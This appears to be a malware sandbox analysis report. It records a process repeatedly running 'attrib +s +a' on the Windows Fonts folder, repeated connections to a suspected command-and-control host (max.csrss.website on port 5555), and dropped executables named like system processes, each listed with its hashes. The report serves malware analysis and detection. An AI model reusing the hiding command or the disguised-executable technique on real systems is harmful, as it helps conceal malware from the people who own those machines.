C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 max.csrss.website udp
US 107.178.223.183:5555 max.csrss.website tcp
US 8.8.8.8:53 18.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.223.178.107.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 107.178.223.183:5555 max.csrss.website tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 104.155.138.21:5555 max.csrss.website tcp
US 8.8.8.8:53 21.138.155.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 104.155.138.21:5555 max.csrss.website tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 107.178.223.183:5555 max.csrss.website tcp
US 107.178.223.183:5555 max.csrss.website tcp

Files

memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp

C:\Windows\Fonts\svchost.exe

MD5 0a7d7ed55c4202f5106824f11ecb22fa
SHA1 730da74e178d7b114e5d4c0f1dcc956accd4942d
SHA256 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595
SHA512 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7

memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tem.vbs

MD5 f88a489a387ebc7c4c0c6b122ff6aa9b
SHA1 197f045b81fc47892ec4b879f4b55ef1fda8f307
SHA256 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a
SHA512 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391

C:\Windows\Fonts\conhost.exe

MD5 5d57bf45fb91812ead7ad8da8c3936a2
SHA1 099c88af6ea4a49d2f80123c47fe85407ec42d69
SHA256 553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019
SHA512 66b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3

C:\Windows\Fonts\KvMonXP.exe

MD5 614a11a087f7e05063f6211c114a29ba
SHA1 903e200c338fd0a15e87214824c7f670cc7d282c
SHA256 dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4
SHA512 947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96

memory/1760-35-0x000001D714D30000-0x000001D714D40000-memory.dmp